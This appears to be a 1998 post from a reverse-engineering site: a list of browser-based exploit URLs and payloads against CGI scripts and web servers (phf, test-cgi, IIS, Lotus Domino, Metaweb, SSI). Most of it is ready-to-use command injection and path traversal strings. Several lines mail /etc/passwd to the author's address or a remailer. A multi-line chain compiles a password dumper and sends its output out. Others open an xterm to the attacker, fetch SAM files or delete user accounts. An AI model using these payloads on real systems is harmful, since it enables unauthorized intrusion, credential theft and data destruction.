courtesy of fravia+'s page of reverse engineering
12 November 1998
hi fravia+, this is my collection of "how to exploit weak sites with your browser". I'm working on a document which includes very new exploits .. I'll let you know when it is ready ... haveaniceday RUDICARELL (Reviewer's note: these are 1998-era CGI issues — almost all are either command injection through shell metacharacters / encoded newlines (%0a, ;, |) passed in unsanitized query strings, or ../ path traversal in a filename parameter; only test them against systems you are authorized to assess.) # test cgi's /cgi-bin/test-cgi?\whatever /cgi-bin/test-cgi?\help&0a/bin/cat%20/etc/passwd /cgi-bin/test-cgi?/* /cgi-bin/test-cgi?* HTTP/1.0 /cgi-bin/test-cgi?x * /cgi-bin/nph-test-cgi?* HTTP/1.0 /cgi-bin/nph-test-cgi?x * # jj /cgi-bin/jj?pwd=SDGROCKS&pop=0&name=rudi&adr=elder4&phone=4523534~/bin/ls # betterones /cgi-bin/info2www?(../../../../../../../bin/mail rudicarell@hotmail.com </etc/passwd) /cgi-bin/blabla?%0a/bin/cat%20/etc/passwd /cgi-bin/finger?tiedotus@uta.fi%3B%2Fbin%2Fmail+rudicarell@hotmail.com+%3C+etc%2Fpasswd /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd /cgi-bin/phf?%0a blablabla &Qalias=&Qname=&Qemail=&Qnickname=&Qoffice_phone= ... etc. /cgi-bin/php.cgi?/etc/passwd /cgi-bin/fi?/etc/passwd /cgi-bin/wais.pl/set%20Gopher=/bin/cat%20/etc/passwd /cgi-bin/webdist.cgi?/bin/mail%20:/etc/passwd[me@myhost.com] /cgi-bin/textcounter.pl?/;IFS=\8;(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|echo;echo| # other stuff /dir/doit.phtml?/home/ftp/incoming/executemycode.phtml /cgi-bin/AnyForm2? ...??? /cgi-bin/infogate? ...??? /cgi-bin/test.bat?&dir .... netscape server /scripts/test.bat+%26dir+%26time+%26abracadabra.exe .... netscape server # microfuck /guti.asp::$DATA asp ...... /global.asa asp ...... # long filenames :) /somewhere/VERYLON~.HTM .... the 8.3 short-name alias of a user-saved verylongyy.htm file # quid pro quo server /site.name/server%20logfile .... 
quid pro quo - server # basic auth and others /cgi-bin/www-sql/protected_directory/something.html /cgi-bin/htmlscript?../../../../../../etc/passwd /cgi-bin/campas?%0acat%0a/etc/passwd%0a /cool-logs/mlog.html?screen=/etc/passwd /cool-logs/mylog.html?screen=/etc/passwd /cgi-bin/view-source?../../../../../../../etc/passwd /cgi-bin/webgais Content-length: (length of the exploit body) query=';mail+rudicarell\@hotmail.com</etc/passwd;echo'&output=subject&domain=paragraph # sgi silicon graphics /cgi-bin/handler/carelli;cat /etc/passwd|?data=Download (SGI! tabs only as whitespace!) /cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|' (SGI!) /cgi-bin/pfdispaly.cgi?/../../../../etc/motd (SGI! old version) /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5rudicarell\@hotmail.com\</etc/passwd;eval$CMD;echo # frontpage extensions www.domain.com/any_directory/_vti_cnf = directory www.domain.com/_vti_pvt = world-writable (on misconfigured installs) # old but still working IIS perl.exe nt/scripts/perl.exe?%20-e%20"system%20('dir%20c:\\winnt35\\repair');" # example for bad perl oa ;xterm -display my.ip.address:0 & john;echo "#include \"pwd.h\"">/tmp/shadow.c john;echo "main(){struct passwd *p;while(p=getpwent())">>/tmp/shadow.c john;echo "printf(\"%s:%s:%d:%d:%s:%s:%s\\n\",p->pw_name,">>/tmp/shadow.c john;echo "p->pw_passwd,p->pw_uid,p->pw_gid,p->pw_gecos,">>/tmp/shadow.c john;echo "p->pw_dir,p->pw_shell);}">>/tmp/shadow.c john;cc -o /tmp/shadow /tmp/shadow.c john;/tmp/shadow>>/tmp/passwd john;/bin/cat /tmp/passwd|/bin/mail remailer@some.remailer.com john;rm /tmp/shadow*;rm /tmp/passwd # sometimes it's really bad ~root ~root/etc/passwd (for example) altavista .... url:etc AND link:passwd ... or ... root: 0:0 url:.htaccess .. or .. url:.htpasswd # NCSA files httpd.conf configure the httpd service srm.conf scripts and documents reside access.conf service features for all browsers .htaccess Limits access on a directory-by-directory basis http .... bla bla /.htaccess (NCSA .........) # microfuck http ... bla bla .. 
/scripts/blabla.bat?&dir+c:\+?&time test.bat+%26dir+%26time+%26pfieffer.exe # novell http ... bla bla .. /files.pl? ../../blabla http ... bla bla .. /scripts/convert.bas?../../any_file_on_sys_volume # MAC WEBSTAR http ... bla bla .. /M_A_C_H_T_T_P_V_E_R_S_I_O_N # lotus domino server (this is really cool) http ... /domcfg.nsf/?open http ... /domcfg.nsf/URLRedirect/?OpenForm http:... /database.nsf/viewname?SearchView&Query="*" # nt carbo server **** http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog # example for server-side includes via anon-ftp upload (this needs the server to process SSI, with #exec enabled, for the writable upload directory) **** <!--#exec cmd="/bin/ls"--> <!--#exec cmd="mail me@my.org < cat /etc/passwd"--> <!--#exec cmd="chmod 777 ~ftp/incoming/uploaded_hack_script"--> <!--#exec cmd="~ftp/incoming/uploaded_hack_script"--> <!--#exec cmd="find / -name foobar -print"--> <!--#include file="schweinenasenfile" --> # metaweb servers http://mail.server.com:5000/../smusers.txt http://mail.server.com:5000/../../winnt/repair/sam._ http://mail.server.com:5000/../../winnt/system32/net.exe? http://mail.server.com:5000/../../winnt/system32/net.exe?user%20joe%20/delete port:2040 = javaconfig port:5000 = mail port:5001 = -"- (ditto) http://www.metainfo.com/products/sendmail/users.htm http://www.metainfo.com/products/metaip/users.htm # verity search software ****** s97_cgi.exe?Action=FormGen&ServerKey=Primary&Template=anything (nt) search97.vts?HLNavigate=On&querytext=dcm&ServerKey=Primary&ResultTemplate=../../../../../../../etc/hosts&ResultStyle=simple&ResultCount=20&collection=books # uaaa |-) zhhhh wwwboard.html /wwwboard/passwd.txt **** wwwadmin.pl or wwwadmin.cgi # cgi from hylafax *** /cgi-bin/faxsurvey?/bin/ls%20-a # other microfuck uploader.exe/ # new lotus-domino http://www.server.com/database.nsf/viewname?SearchView&Query="*" /*end*/